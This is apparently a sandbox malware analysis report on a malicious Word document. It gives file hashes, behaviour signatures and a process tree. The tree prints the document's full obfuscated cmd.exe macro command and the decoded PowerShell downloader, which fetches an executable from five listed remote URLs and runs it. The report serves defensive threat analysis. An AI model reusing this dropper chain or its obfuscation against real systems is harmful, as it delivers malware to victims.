Overview

overview

10

Static

static

8

914c0f87ae...18.doc

windows7-x64

10

914c0f87ae...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    03/06/2024, 09:35

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    914c0f87aef05aa403558d1825c3ef02_JaffaCakes118.doc

  • Size

    137KB

  • MD5

    914c0f87aef05aa403558d1825c3ef02

  • SHA1

    5a6bbe6a47b8329c8f88ee7ebbe2e68f41808e93

  • SHA256

    d0a30f503c8a18a5d119b95b9544c294cb023d7287419b4fcc64a41e30ea21ba

  • SHA512

    5279068c51162942faec3d78d9a61b97215fa90f5ae366c5991e6c7e278831430fc068d59a29d6e2b79b91c173aef189ce211140216b5996d8cc5bba9ba7216e

  • SSDEEP

    3072:S8GhDS0o9zTGOZD6EbzCdQq3/I7ChQ1aL1C:8oUOZDlbeQqPIehQ1aL1C

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\914c0f87aef05aa403558d1825c3ef02_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2428
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\djlHiiJvoFIViL\RzjPdOpBsDBQMi\YRLnzqw\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -"
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $mGS='LNG';$fkc=new-object Net.WebClient;$XJL='http://marquisediamondengagementring.com/Rfg@http://omid1shop.com/2iyjzo@http://nhakhoaucchau.com.vn/riCIYlP8@http://nycfpf.com/2l0@http://mi.bmgu-dev.com/6ai'.Split('@');$jci='Xwo';$PXL = '697';$tza='hNY';$zXA=$env:temp+'\'+$PXL+'.exe';foreach($GNb in $XJL){try{$fkc.DownloadFile($GNb, $zXA);$iLV='WBw';If ((Get-Item $zXA).length -ge 80000) {Invoke-Item $zXA;$TXY='imK';break;}}catch{}}$Fpi='JpA';"
            4⤵
              PID:2984
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=D.j tokens=2" %w IN ('ftype^|find "llDa"') DO %w -"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1580
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ftype|find "llDa"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1884
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ftype"
                  6⤵
                    PID:892
                  • C:\Windows\SysWOW64\find.exe
                    find "llDa"
                    6⤵
                      PID:352
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    PowerShell -
                    5⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:856

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
                  Filesize

                  20KB

                  MD5

                  3e2de4acf445250b86ce8ab2ed776339

                  SHA1

                  278d5f4b6bd4aff3103a89164fae1cb30a2e26d4

                  SHA256

                  cae37eab9f53108c4baa8e1ede2e429975c395e1fee4763dbaa6a167ec97be20

                  SHA512

                  991b13ffbe05d0085b3a3da3b541533c428094efcb32d0a74da0b90a0242d075515429144711ce67f58ce239a2a8d3e1c707e17c0f05c22a0e48efda3784b6d6

                  Download Submit

                • memory/2020-10-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2020-2-0x0000000070D1D000-0x0000000070D28000-memory.dmp

                  Filesize

                  44KB

                  Download

                • memory/2020-6-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2020-7-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2020-11-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2020-0-0x000000002F4B1000-0x000000002F4B2000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2020-9-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2020-8-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2020-19-0x0000000070D1D000-0x0000000070D28000-memory.dmp

                  Filesize

                  44KB

                  Download

                • memory/2020-20-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                  Download

                • memory/2020-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2020-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2020-39-0x0000000070D1D000-0x0000000070D28000-memory.dmp

                  Filesize

                  44KB

                  Download